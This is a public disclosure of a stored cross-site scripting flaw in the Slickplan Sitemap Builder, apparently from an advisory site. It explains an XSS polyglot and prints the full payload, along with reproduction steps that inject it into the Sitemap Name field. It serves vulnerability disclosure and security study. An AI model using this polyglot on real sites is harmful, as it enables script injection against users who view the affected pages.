Slickplan Sitemap Builder Vulnerability disclosure

2019.09.29
qa 0.00 (QA) qa
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Product Owner: Slickplan Sitemap Builder Found by: xdff4ee Application Name: Basic sitemap builder Version 1.0 Severity: High Authentication: Required Complexity: Easy Vulnerability Name: Stored Cross-site scripting - XSS Polyglot (Stored) Vulnerability Explanation: An XSS polyglot can be generally defined as an XSS vector that is executable within various injection contexts in its raw form. Browsers Verified In: Firefox 68.0.2 (64-bit) Google Chrome 76.0.3809.100 (64-bit) Anatomy of the polyglot jaVasCript:: A label in ECMAScript; a URI scheme otherwise. /*-/*`/*\`/*'/*"/**/: A multi-line comment in ECMAScript; a literal-breaker sequence. (/* */oNcliCk=alert() ): A tangled execution zone wrapped in invoking parenthesis! //%0D%0A%0d%0a//: A single-line comment in ECMAScript; a double-CRLF in HTTP response headers. </stYle/</titLe/</teXtarEa/</scRipt/--!>: A sneaky HTML-tag-breaker sequence. \x3csVg/<sVg/oNloAd=alert()//>\x3e: An innocuous svg element. Impact: Stored XSS allows an attacker to embed a malicious script into a vulnerable page, which is then executed when a victim views the page. Reflected cross-site scripting relies on a victim being socially engineered into clicking on a malicious link, sent via email for example. Proof of Concept: (Stored Cross-site scripting - XSS Polyglot (Stored)) Affected items: Sitemap: Url: https://lmentrix.slickplan.com/sitemap/edit/nxwhsr7gra Stored Polyglot XSS Execution - Different browser Payload Used: HTML comments: <!-- jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(123) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(123)//>\x3e --> Step to reproduce: Login with a valid username and password Enter the above-provided payload on the Sitemap Name field, then click create the sitemap, the stored Polyglot XSS payload will reflect on your browser. Even after refreshing the page & also clearing the cookies, the XSS payload will execute on the browsers. Complete POC Video is also attached for better understanding. After continuous e-mail, the vendor didn't reply, so I decided to disclose publicly.

References:

https://slickplan.com/


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top